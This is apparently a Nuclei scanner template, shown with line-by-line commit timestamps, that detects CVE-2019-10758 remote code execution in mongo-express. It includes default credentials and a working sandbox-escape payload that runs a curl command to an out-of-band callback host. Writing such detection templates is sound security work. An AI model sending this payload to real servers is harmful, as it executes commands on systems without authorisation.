2022-02-10 21:31:25 +00:00
id : CVE-2019-10758
2022-04-01 08:51:42 +00:00
2022-02-10 21:31:25 +00:00
info :
2022-04-01 08:51:42 +00:00
name : mongo-express Remote Code Execution
2022-02-10 21:31:25 +00:00
author : princechaddha
severity : critical
2022-04-22 10:38:41 +00:00
description : mongo-express before 0.54.0 is vulnerable to remote code execution via endpoints that uses the `toBSON` method and misuse the `vm` dependency to perform `exec` commands in a non-safe environment.
2023-09-06 12:53:28 +00:00
remediation : Upgrade mongo-express to version 0.54.0 or higher.
2022-02-10 21:31:25 +00:00
reference :
- https://github.com/vulhub/vulhub/tree/master/mongo-express/CVE-2019-10758
- https://nvd.nist.gov/vuln/detail/CVE-2019-10758
2022-05-17 09:18:12 +00:00
- https://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-473215
2022-02-12 11:46:39 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.9
2022-02-12 11:46:39 +00:00
cve-id : CVE-2019-10758
2023-10-14 11:27:55 +00:00
epss-score : 0.97406
2023-10-17 17:52:26 +00:00
epss-percentile : 0.999
2023-09-06 12:53:28 +00:00
cpe : cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:*
2022-04-22 10:38:41 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : mongo-express_project
product : mongo-express
2023-09-06 12:53:28 +00:00
framework : node.js
shodan-query : http.title:"Mongo Express"
2022-08-27 04:41:18 +00:00
tags : vulhub,cve,cve2019,mongo,mongo-express,kev
2022-02-10 21:31:25 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-02-10 21:31:25 +00:00
- raw :
- |
POST /checkValid HTTP/1.1
Host : {{Hostname}}
Authorization : Basic YWRtaW46cGFzcw==
Content-Type : application/x-www-form-urlencoded
2022-08-25 15:20:19 +00:00
document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl {{interactsh-url}}")
2023-07-11 19:49:27 +00:00
2022-02-10 21:31:25 +00:00
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : interactsh_protocol # Confirms the HTTP Interaction
2022-02-10 21:31:25 +00:00
words :
- "http"
2023-10-20 11:41:13 +00:00
# digest: 490a0046304402203136abd20b720aaa949896c30c680a181222f9a817ba2bafe3fb39dc2c905b46022024ab93e82da764ddd360229740a60db395ace9d4ea959e87b485e3170cf0df54:922c64590222798bb761d5b6d8e72950